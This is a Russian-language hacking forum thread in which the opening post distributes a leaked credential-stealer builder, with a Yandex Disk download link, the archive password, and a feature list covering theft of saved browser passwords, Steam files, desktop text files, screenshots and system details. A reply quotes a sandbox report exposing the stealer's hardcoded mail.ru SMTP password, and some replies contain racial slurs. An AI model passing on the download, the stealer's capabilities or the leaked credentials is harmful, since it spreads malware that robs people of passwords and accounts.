Stealer Private - [Builder c0d3d By PC-RET]

DaRkMatRix

Новичок
Статус
offline
Регистрация
21.08.2017
Сообщения
28
Репутация
1
o9K2wHV.png

(СЛИВ С ДРУГОГО ФОРУМА)
1) Кража паролей браузеров:
- Yandex Browser
- Xpom
- Amigo Browser
- Google Chrome
- Comodo
- Opera Software
- Mozilla Firefox
- Steam ssfn
- Steam config
2) Кража .txt файлов с рабочего стола.
3) Фотография рабочего стола жертвы.
4) Информация о компьютере жертвы:
- Время системы на момент отправки отчета
- Дата системы на момент отправки отчета
- Айпи системы с которой отправлен отчет
- Имя пользователя системы, который открыл стаб
- Диск на котором установлена система Windows
- Номер HDD в 16 ричном формате
- Архив в котором содержатся украденные данные
Сразу отмечу что на XP работа невозможна.

ССЫЛКА: https://yadi.sk/d/pVyho49i3EpUAA
pass:ha
VT:https://metadefender.opswat.com/results#!/file/ZTE3MDEyNkIxY3ZqNUp1dmdIa2pQanExT0R4/regular/overview
 
Последнее редактирование:

Sweet Dreams

Резидент
Статус
offline
Регистрация
16.11.2017
Сообщения
264
Репутация
225
⁣Telegram
Нигер, я тебя жду, мой милый! ^_^
 

lev2016

Участник
Статус
offline
Регистрация
29.12.2016
Сообщения
44
Репутация
32
Какой пароль?
 

Diakko

Новичок
Статус
offline
Регистрация
01.12.2017
Сообщения
11
Репутация
1
1 Запуск стилера разовый или он потом висит в процессах и продолжает работать?
2 Отчёт формируется один раз или с заданной периодичностью?
3. Собираются только сохранённые пароли или вводимые тоже (после запуска)?
 

nomanwho

Заблокированные
Статус
offline
Регистрация
09.12.2017
Сообщения
20
Репутация
0
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.

Joyckman

Заблокированные
Статус
offline
Регистрация
08.01.2017
Сообщения
87
Репутация
35
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.

kirashinji

Заблокированные
Статус
offline
Регистрация
21.10.2017
Сообщения
136
Репутация
30
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Негр проверь плез
 

nomanwho

Заблокированные
Статус
offline
Регистрация
09.12.2017
Сообщения
20
Репутация
0
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
че пароль не кто не подскажет ?
 

nomanwho

Заблокированные
Статус
offline
Регистрация
09.12.2017
Сообщения
20
Репутация
0
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
'это не оригинал..оригинал всего 1.5 весит.
Found potential URL in binary/memory
details
Heuristic match: "command.com"
Heuristic match: "Stealer Private - [Builder c0d3d By PC-RET] | BHF.IO"
Heuristic match: "T$D(^ .lv"
Pattern match: "http://www.openssl.org/"
Heuristic match: "Visual Studio .NET"
Pattern match: "http://2ip.ru/"
Heuristic match: "[email protected]"
Heuristic match: "[email protected]"
Heuristic match: "n5|.com"
Heuristic match: "and.com"
source
String
relevance
10/10

Логин: [email protected]
Пароль: wallecs1

2ip.ru 178.63.151.224 - Germany
smtp.mail.ru 94.100.180.160 - Russian Federation
Contacted Hosts
Login to Download Contacted Hosts (CSV)
IP Address Port/Protocol Associated Process Details
178.63.151.224
OSINT 80
TCP release.exe
PID: 2472 Germany
ASN: 24940 (Hetzner Online AG)
94.100.180.160
OSINT 465
TCP release.exe
PID: 2472 Russian Federation

создает второй файл.
release.exe (PID: 2472)

з.ы. крайне! не советую пользовать
 

DaRkMatRix

Новичок
Статус
offline
Регистрация
21.08.2017
Сообщения
28
Репутация
1
'это не оригинал..оригинал всего 1.5 весит.
Found potential URL in binary/memory
details
Heuristic match: "command.com"
Heuristic match: "Stealer Private - [Builder c0d3d By PC-RET] | BHF.IO"
Heuristic match: "T$D(^ .lv"
Pattern match: "http://www.openssl.org/"
Heuristic match: "Visual Studio .NET"
Pattern match: "http://2ip.ru/"
Heuristic match: "[email protected]"
Heuristic match: "[email protected]"
Heuristic match: "n5|.com"
Heuristic match: "and.com"
source
String
relevance
10/10

Логин: [email protected]
Пароль: wallecs1

2ip.ru 178.63.151.224 - Germany
smtp.mail.ru 94.100.180.160 - Russian Federation
Contacted Hosts
Login to Download Contacted Hosts (CSV)
IP Address Port/Protocol Associated Process Details
178.63.151.224
OSINT 80
TCP release.exe
PID: 2472 Germany
ASN: 24940 (Hetzner Online AG)
94.100.180.160
OSINT 465
TCP release.exe
PID: 2472 Russian Federation

создает второй файл.
release.exe (PID: 2472)

з.ы. крайне! не советую пользовать
Я за прогу не ручаюсь ибо это слив
 

nomanwho

Заблокированные
Статус
offline
Регистрация
09.12.2017
Сообщения
20
Репутация
0
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.

Freiiidd

Новичок
Статус
offline
Регистрация
22.01.2018
Сообщения
1
Репутация
0
Не пашет нихая